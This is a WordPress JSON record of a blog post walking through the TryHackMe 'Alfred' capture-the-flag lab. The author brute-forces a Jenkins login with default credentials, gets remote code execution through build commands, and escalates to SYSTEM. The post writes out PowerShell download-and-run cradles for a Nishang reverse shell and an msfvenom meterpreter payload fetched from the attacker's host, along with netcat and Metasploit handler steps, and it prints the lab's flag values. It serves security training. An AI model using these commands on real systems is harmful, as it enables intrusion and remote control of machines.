{"id":130837,"date":"2022-12-25T10:35:58","date_gmt":"2022-12-25T10:35:58","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1000191"},"modified":"2022-12-25T10:35:58","modified_gmt":"2022-12-25T10:35:58","slug":"tryhackme-alfred-how-i-solved-the-challenge-video","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2022\/12\/25\/tryhackme-alfred-how-i-solved-the-challenge-video\/","title":{"rendered":"TryHackMe Alfred \u2013 How I Solved The Challenge [+Video]"},"content":{"rendered":"\n
\n
\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n
5\/5 – (1 vote) <\/div>\n<\/p><\/div>\n
\"YouTube<\/a>
<\/figcaption><\/figure>\n

In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY\/SYSTEM, which is the equivalent of root<\/code> on a Windows machine. <\/p>\n

\"\u2694\" Challenge<\/strong>: I need to capture two “flags”, the user.txt<\/code> flag and the root.txt<\/code> flag. Let\u2019s get started!<\/p>\n

First, we\u2019ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.<\/p>\n

INITIAL ENUMERATION<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
IPs\nexport myIP=10.6.2.23\nexport targetIP=10.10.99.176 \u250c\u2500\u2500(tester\u327fbox)-[~\/THM]\n\u2514\u2500$ nmap 10.10.216.90 -Pn\nStarting Nmap 7.93 ( https:\/\/nmap.org ) at 2022-12-10 22:39 EST\nNmap scan report for 10.10.216.90\nHost is up (0.083s latency).\nNot shown: 997 filtered tcp ports (no-response)\nPORT STATE SERVICE\n80\/tcp open http\n3389\/tcp open ms-wbt-server\n8080\/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds\n<\/pre>\n
We see that there are three open ports. <\/p>\n
There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser. <\/p>\n
The ms-wbt-server<\/code> running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol). <\/p>\n
Also, the http-proxy<\/code> on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There\u2019s not much here to see. A quick look at the source HTML code doesn\u2019t reveal anything else interesting.<\/p>\n
HACKING JENKINS WITH BURPSUITE<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
On port 8080, we find a login page to Jenkins.<\/p>\n
Let\u2019s take a few guesses with some of the standard factory-set passwords: admin:password<\/code>, admin:admin<\/code>, etc. <\/p>\n
Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack. <\/p>\n
Based on the different lengths of the responses, we can see that admin:admin<\/code> may be our winning combination. We are in luck that this company has lazy administrators who don\u2019t properly safeguard their business! The system lets us in as expected with admin:admin<\/code>.<\/p>\n
At TryHackMe\u2019s suggestion, we’ll use Nishang for spawning a revshell<\/code> from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure. <\/p>\n
In the last text box, we can perform remote command execution. <\/p>\n
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
First, let\u2019s spawn a reverse shell using PowerShellTcp.ps1<\/code> from nishang\u2019s git repo<\/a>. After downloading the file from the git repo, we launch a Netcat listener with the command: <\/p>\n
nc -lnvp 8888<\/pre>\n
Then we use the following command in the last text box on Jenkins project 1 settings.<\/p>\n
powershell iex (New-Object Net.WebClient).DownloadString('http:\/\/10.6.2.23:8000\/Invoke-PowerShellTcp.ps1'>\n<\/pre>\n
After clicking on \u201cbuild<\/code>\u201d in the Jenkin\u2019s dashboard, we catch the shell on our Netcat listener and discover the user.txt<\/code> flag!<\/p>\n
!!!\nuser.txt:<\/strong>\n79007a09481963edf2e1321abd9ae2a0\n!!!<\/code>\n<\/pre>\n
USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:<\/p>\n
sudo msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 – encoder x86\/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe<\/pre>\n
Now we need to start up Metasploit console:<\/p>\n
Msfconsole<\/pre>\n
Load the meterpreter exploit\/multi\/handler:<\/p>\n
use exploit\/multi\/handler<\/pre>\n
Set up our payload:<\/p>\n
set payload windows\/meterpreter\/reverse_tcp payload<\/pre>\n
And finally, type: run<\/code><\/p>\n
First, we\u2019ll spin up a simple HTTP server to copy shell.exe<\/code> to windows with:<\/p>\n
python -m http.server 8000<\/pre>\n
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:<\/p>\n
powershell \"(New-Object System.Net.WebClient).Downloadfile('http:\/\/10.6.2.23:8000\/shell.exe','shell.exe')\"<\/pre>\n
And Metasploit successfully launches a new meterpreter session on the target box. If the shell.exe<\/code> file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:<\/p>\n
.\/shell.exe<\/pre>\n
PRIVILEGE ESCALATION TO ROOT<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:<\/p>\n
getsystem<\/pre>\n
We now operate with NT AUTHORITY\/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine. <\/p>\n
Entering the command \u201cps<\/code>\u201d will give us a list of processes. We\u2019ll use the process system.exe<\/code> with the following command:<\/p>\n
migrate <PID><\/code> (process id of the target process running by NT AUTHORITY\/SYSTEM, in this case system.exe<\/code>)<\/p>\n
Now we are running metasploit in the RAM of our target machine on the system.exe<\/code> process. We have full NT AUTHORITY\/SYSTEM privileges and can easily find root.txt<\/code> with the following command:<\/p>\n
find -f root.txt cat root.txt\n\ufffd\ufffddff0f748678f280250f25a45b8046b4a\n<\/pre>\n
Thanks for reading\/watching my walkthrough. \"\ud83d\ude4f\"<\/p>\n","protected":false},"excerpt":{"rendered":"
5\/5 – (1 vote) In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY\/SYSTEM, which is the equivalent of root on a […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-130837","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130837","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=130837"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130837\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=130837"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=130837"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=130837"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}